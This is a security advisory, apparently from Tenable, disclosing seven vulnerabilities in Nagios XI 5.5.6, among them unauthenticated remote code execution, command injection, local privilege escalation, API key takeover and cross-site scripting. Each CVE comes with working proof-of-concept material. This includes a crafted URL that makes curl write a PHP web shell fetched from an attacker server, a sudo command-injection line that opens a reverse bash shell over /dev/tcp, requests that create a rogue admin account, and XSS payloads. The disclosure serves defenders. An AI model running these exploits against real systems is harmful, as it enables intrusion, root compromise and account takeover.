[R2] Nagios XI Multiple Vulnerabilities

Tenable has discovered multiple vulnerabilities in Nagios XI 5.5.6.

CVE-2018-15708: Magpie_debug.php Unauthenticated RCE via Command Argument Injection

A critical vulnerability exists in the MagpieRSS library. This library contains a custom version of the Snoopy component which allows a remote, unauthenticated attacker to inject arbitrary arguments into a "curl" command. By requesting magpie_debug.php with a crafted value specified in the HTTP GET 'url' parameter, the vulnerable component can be exploited to write arbitrary data to a location on disk that is writable by the 'apache' user. For instance, the location /usr/local/nagvis/share/ is writable and publicly accessible. If an attacker were to write PHP code to this location, arbitrary code execution may be achieved with the privileges of the apache user.

Combined with the local privilege escalation vulnerability, arbitrary code execution with root privileges is feasible.

Magpie_debug.php accepts an HTTP GET parameter, 'url', and subsequently calls fetch_rss() with the URL as an argument. The fetch_rss function is defined in /usr/local/nagiosxi/html/includes/dashlets/rss_dashlet/magpierss/rss_fetch.inc and is used to perform an HTTP request against the provided URL. Digging further, the _fetch_remote_file() function is called, which then instantiates a Snoopy object. The fetch() method of the Snoopy class is then called, which eventually ends up calling the _httpsrequest() method if an HTTPS URL was specified.

Specifically, the problematic code relates to this line in Snoopy.class.inc:

exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

A remote attacker can exploit this flaw without difficulty.

Proof of Concept

Suppose an attacker sets up a web server at https://192.168.1.191:8080/. The attacker configures the server to respond with PHP code. Something like this:

<?php system($_GET['cmd']); ?>

The Nagios XI instance is located at https://192.168.1.208. Using the following URL, the attacker may exploit the flaw in the Snoopy class and write the PHP code to /usr/local/nagvis/share/exec.php. Notice that “-o /usr/local/nagvis/share/exec.php” is included in the value of the ‘url’ parameter. This tells curl to output the response to this file.

https://192.168.1.208/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://192.168.1.191:8080/%20-o%20/usr/local/nagvis/share/exec.php

Once this request is completed, the attacker can execute arbitrary system commands by crafting a URL like such:

https://192.168.1.208/nagvis/exec.php?cmd=whoami

CVE-2018-15709: Cmdsubsys.php Authenticated Command Injection

The Nagios subsystem is vulnerable to command injection in many cases. An authenticated attacker may inject and execute arbitrary OS commands. This can be accomplished by a low-privileged user (non-admin).

Ultimately, the subsystem commands are handled by /usr/local/nagiosxi/cron/cmdsubsys.php.

The proof of concept below exploits the command COMMAND_NAGIOSXI_SET_HTACCESS (1100) by injecting OS commands into the 'password' field. A code snippet is provided to show the vulnerable code. Please note that this is not the only vulnerable command.

case COMMAND_NAGIOSXI_SET_HTACCESS:
	$cmdarr = unserialize($command_data);	
	$cmdline = $cfg['htpasswd_path']." -b -s ".$cfg['htaccess_file']." ".$cmdarr["username"]." '".$cmdarr["password"]."'";
	break;
...
$output = system($cmdline, $return_code);

Proof of Concept

Be sure to replace the IP address and ‘nsp’ value accordingly.

https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312

Afterward, it can be verified that the command worked as expected. Notice the user is ‘nagios’.

$ cat /usr/local/nagiosxi/tmp/whoami.txt
nagios

CVE-2018-15710: Autodiscover_new.php Local Privilege Escalation via Command Injection

autodiscover_new.php suffers from a local command injection vulnerability which can be exploited to gain root OS privileges. This file is protected by Source Guardian, so a full root cause analysis cannot be conducted. However, based on results of black box testing, it is clear that the value of the 'addresses' command line parameter is incorporated in a subsequent call to a dangerous PHP function used to launch another process. Furthermore, the value is unsanitized before being used to construct the command line. This coding flaw allows an attacker to inject and execute arbitrary shell commands.

Additionally, the /etc/sudoers file contains entries that enable this PHP script to be launched with root privileges without a password.

User_Alias      NAGIOSXI=nagios
User_Alias      NAGIOSXIWEB=apache
...
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
...
NAGIOSXIWEB ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *

Proof of Concept

If we put it all together, the 'apache' and 'nagios' users may exploit the command injection flaw to gain root privileges. Note that the payload in this case is a reverse bash shell connecting back to 192.168.1.191 over TCP port 4444.

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'

CVE-2018-15711: Unauthorized API Key Regeneration

A low-privileged, authenticated user can force API key regeneration for any Nagios XI user (including admins). When the API key is regenerated, a new one is returned in the response body. This enables the malicious user to then perform subsequent API calls with an elevated level of permissions. For instance, a new admin user could be created.

Proof of Concept

The following URL can be used to regenerate the API key for a user with ID 1 (nagiosadmin). Take note that the IP address and 'nsp' value will need to be updated accordingly.

https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts={%22func%22:%22set_random_api_key%22,%22args%22:{%22user_id%22:1}}&nsp=cc326511f1d7384bb9bf4ff619c9db91756574acb65217d27109923d6647a37e

The associated response looks like such:

HTTP/1.1 200 OK
Date: Tue, 23 Oct 2018 18:56:07 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Content-Length: 64
Connection: close
Content-Type: text/html; charset=UTF-8

XKrjj3f20Fr49jiQF5E2LkZ3bl9spABmAjYSFdUV9FZBeBHTGhbnEaJ5PSQeIoTe

Note that the API key returned belongs to the user for which it was regenerated. In this case, the API key belongs to nagiosadmin. This serves as a privilege escalation within the Nagios XI application because more functionality can now be invoked.

For example, a new admin user could be added.

https://192.168.1.208/nagiosxi/api/v1/add_user&apikey=XKrjj3f20Fr49jiQF5E2LkZ3bl9spABmAjYSFdUV9FZBeBHTGhbnEaJ5PSQeIoTe&username=scrappy&password=scrappy&[email protected]&name=scrappy+do&auth_level=admin&api_enabled=1&force_pw_change=0&can_see_all_hs=1&can_control_all_hs=1&can_reconfigure_hs=1&can_control_engine=1&can_use_advanced=1

CVE-2018-15712: Api_tool.php Unauthenticated Persistent Cross-site Scripting

A persistent cross-site scripting (XSS) vulnerability exists in the Nagios XI Business Process Intelligence (BPI) component's api_tool.php. The file located at /usr/local/nagiosxi/etc/components/bpi.conf can be tampered with. An attacker is able to inject new entries by crafting the HTTP GET 'host' parameter value. This file is read by /nagiosxi/includes/components/nagiosbpi/index.php when a user opens the BPI view. A bpi.conf file that was tampered with could end up looking like the following. Take note of the second entry:

define linux-servers {
        title=HG: linux-servers
        desc=
        primary=1
        info=
        members=localhost;NULL;&, hello
}
define <script>alert(1)</script> {
desc=</strong><script>alert(2)</script>;NULL;&, 
        warning_threshold=0
        critical_threshold=0 
        priority=0
        type=hostgroup
        auth_users=
}

Proof of Concept

Note: Be sure to change IP addresses to match your environment. Two requests are required to inject the XSS payload:

https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/api_tool.php?cmd=syncall

https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/api_tool.php?cmd=addmember&group=linux-servers&host=hello%0a}%0adefine%20%3Cscript%3Ealert(1)%3C/script%3E%20{%0adesc=%3C/strong%3E%3Cscript%3Ealert(2)%3C/script%3E

Once these have completed, login with a valid user and visit the following URL:

https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/index.php

CVE-2018-15713: Users.php Authenticated Persistent Cross-site Scripting

A persistent cross-site scripting vulnerability was discovered in Nagios XI in admin/users.php. This vulnerability requires authentication to be exploited successfully.

Specifically, the vulnerability exists due to the lack of input validation when displaying a user's e-mail address on admin/users.php. This value can be defined by modifying a user's e-mail address via /account/main.php or /admin/users.php. Users.php requires an administrator level of access; however, main.php does not. This means that a low-privileged user can inject an XSS payload, and an admin user will be impacted by the attack.

Fortunately, cookies are flagged as 'httpOnly', so malicious JavaScript can't access the session ID stored in the cookie. However, the Nagios Session Protector (nsp) value may be accessed because it is stored in the DOM. This will allow an attacker to steal these tokens and subsequently create malicious forms or links to facilitate request forgery.

Proof of Concept

In order to test the PoC’s, replace the IP address with an accessible IP or hostname which has a Nagios XI instance installed/configured, update the 'nsp' value, and update the cookie accordingly.

POST /nagiosxi/account/main.php?page=acctinfo HTTP/1.1
Host: 192.168.1.208
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.208/nagiosxi/account/main.php?&=
Content-Type: application/x-www-form-urlencoded
Content-Length: 359
Cookie: nagiosxi=sg3pa9fi5e4ngj6a4jgm287jg7
Connection: close
Upgrade-Insecure-Requests: 1

update=1&nsp=e7fc3b0557861b1f39d6a2827edcf515086c7f2ec96acdd885a952266ba437be&current_password=&password1=&password2=&name=Scooby+Doo&email=%3Cscript%3Ealert%28%22hello+poppet%22%29%3C%2Fscript%3Escooby1%40tenable.com&language=en_US&theme=&highcharts_default_type=line&defaultDateFormat=1&defaultNumberFormat=2&defaultWeekFormat=0&updateButton=Update+Settings

POST /nagiosxi/admin/users.php?edit=1&user_id[]=2 HTTP/1.1
Host: 192.168.1.208
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.208/nagiosxi/admin/users.php?edit=1&user_id[]=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 498
Cookie: nagiosxi=sg3pa9fi5e4ngj6a4jgm287jg7
Connection: close
Upgrade-Insecure-Requests: 1

update=1&nsp=02bc33485c2fd6edac30ee7e7af1a2f14d47c36ffb9cd8c9b5e74721bb886dbd&users=1&user_id%5B%5D=2&username=scooby&password1=&password2=&name=Scooby+Doo&email=%3Cscript%3Ealert%28nsp_str%29%3C%2Fscript%3Escooby1%40tenable.com&phone=&enable_notifications=on&enabled=on&language=en_US&defaultDateFormat=1&defaultNumberFormat=2&defaultWeekFormat=0&auth_type=local&ad_username=&dn=&level=1&ccm_access=0&apikey=jt2ZRc3fdPnn6VSKn3QZZdSVabJp7tbJZcY8n2mT7MBcYpdFMjU2PMXYeWHkpRkJ&updateButton=Update+User

CVE-2018-15714 - Checkauth.php Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability exists within account/checkauth.php. The HTTP GET 'oname' parameter is not processed safely; therefore, malicious JavaScript can be injected and executed. Other parameters are exploitable as well (such as 'oname2');

For example, the following code snippet from checkauth.php outputs the values of the 'oname' and 'oname2' parameters into the HTML response.

<td>Object Name:</td>
<td><input type="text" name="oname" value="<?php echo $oname; ?>" size="15">
<input type="text" name="oname2" value="<?php echo $oname2; ?>" size="15"></td>

Proof of Concept

https://192.168.1.208/nagiosxi/account/checkauth.php?oname=" autofocus onfocus="javascript:alert(nsp_str)